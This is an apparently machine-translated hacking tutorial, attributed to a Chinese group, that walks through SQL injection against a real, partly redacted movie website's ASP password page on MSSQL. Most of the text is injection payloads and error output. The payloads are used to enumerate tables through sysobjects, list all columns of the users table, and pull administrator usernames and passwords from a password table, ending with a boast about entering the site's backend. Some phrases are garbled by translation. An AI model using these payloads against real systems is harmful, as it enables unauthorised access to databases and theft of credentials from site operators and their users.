Author: Leaf [EST]
Source: evil baboons China
Table Name and field name acquisition _ Applicability:
1) The database is MSSQL
2) Only common users are connected to the database.
3) unknown ASP source code
Attacks that can be carried out
1) Add, view, and change data content
Instance:
This document uses
Asp "> http://www.dy ***. com/user/wantpws. asp
Test attacks for columns.
Step 1:
Enter single quotes at the user name to display
Microsoft ole db Provider for SQL Server Error 80040e14
There are unclosed quotation marks before the string.
/User/wantpws. asp, row 63
It indicates that the single quotes are not filtered and the database is MSSQL.
Step 2:
Enter a; use master ;--
Display
Microsoft ole db Provider for SQL Server Error 80040e21
Multiple ole db operations generate errors. If possible, check the status value of each ole db. No work is completed.
/User/wantpws. asp, row 63
This means you have no permission.
Step 3:
Input: a or name like fff % ;--
A user named ffff is displayed.
Step 4:
Enter the username
Ffff and 1 <> (select count (email) from [user]); --
Display:
Microsoft ole db Provider for SQL Server Error 80040e37
The Object Name user is invalid.
/User/wantpws. asp, row 96
It indicates that there is no table named user. You can try it with users. It also indicates that there is a column named "email.
(One way to move the east to the cloud is to input a having 1 = 1 --
Generally, the following table name and field name can be obtained directly.
Microsoft ole db Provider for SQL Server Error 80040e14
The users. ID column is invalid in the selection list because it is not included in the aggregate function and has no group by clause.
/User/wantpws. asp, row 63
)
Now we know that the password of the ffff user is 111111.
The following statements are used to obtain all table names and field names in the database.
Step 5:
Input:
Ffff; update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) where name = ffff ;--
Note:
The preceding statement is used to obtain the first user table in the database and put the table name in the ffff user's mailbox field.
By viewing ffff user information, you can obtain the first table named ad.
Then, the table ID is obtained based on the table name ad.
Ffff; update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = ffff ;--
As shown in the preceding figure, the id is 581577110.
Because the object flag IDs are arranged in ascending order, we can get the names of all user tables.
In this way, you can get the name of the second table.
Ffff; update [users] set email = (select top 1 name from sysobjects where xtype = u and id> 581577110) where name = ffff ;--
Active Directory 581577110
Users' 597577167
Buy 613577224
Car 629577281
Learning 1, 645577338
Logs 661577395
Movie 677577452
Movieurl 693577509
Password 709577566
Type 725577623
Talk
After a period of speculation, we can see from the above analysis that the password and users are the most important
Step 6: Guess important table fields
Input:
Now let's take a look at the fields in the users table.
Ffff; update [users] set email = (select top 1 col_name (object_id (users), 3) from users) where name = ffff ;--
The third field is password.
Ffff; update [users] set email = (select top 1 col_name (object_id (users), 4) from users) where name = ffff ;--
The fourth field is name.
Finally, all 28 fields in the users table are available.
(Note: another method to obtain fields is provided that the system Returns Error information.
A group by ID having 1 = 1 --
Get
Microsoft ole db Provider for SQL Server Error 80040e14
The users. userid column is invalid in the selection list because it is neither included in the aggregate function nor in the group by clause.
/User/wantpws. asp, row 63
The second field is userid.
The third field is displayed.
A group by id, userid having 1 = 1 --
Microsoft ole db Provider for SQL Server Error 80040e14
The users. password column is invalid in the selection list because it is neither included in the aggregate function nor in the group by clause.
/User/wantpws. asp, row 63
The password is obtained.
Similarly, all are displayed. :)
)
Users table
1 2 3 4
Id userid password name
5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send
17 18 19 20 21 22 23 24 25 26 27 28
Oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note
Starlook -- 12 10 2003 PM
Nlook --- 0
Nos --- 2 login times
Date -- 12 10 2003 12: 00 AM registration time?
Money-Same as above
Send -- null
Oklook -- 0
Dnlook -- 0
Getmoney -- 0
State -- 0
Note -- this guy is very good... Description
Password table
1 2 3
Id name pwd
Then I tried ad to record ad hitting points ..
Then try the password table to obtain the name and pwd fields.
Run
Ffff; update [users] set email = (select top 1 name from password) where name = ffff ;--
The first user name is admin123. Most of them are administrators.
Then we get the password "dy ***" or "dick188...
In this way, we have completely entered the background of this movie website, haha.
Http://www.dy ***. com/login. asp
You can also see the three-person password of the Administrator.
Ffff; update [users] set email = (select top 1 count (id) from password) where name = ffff ;--
Ffff; update [users] set email = (select top 1 pwd from password where id = 2) where name = ffff ;--
Ffff; update [users] set email = (select top 1 name from password where id = 2) where name = ffff ;--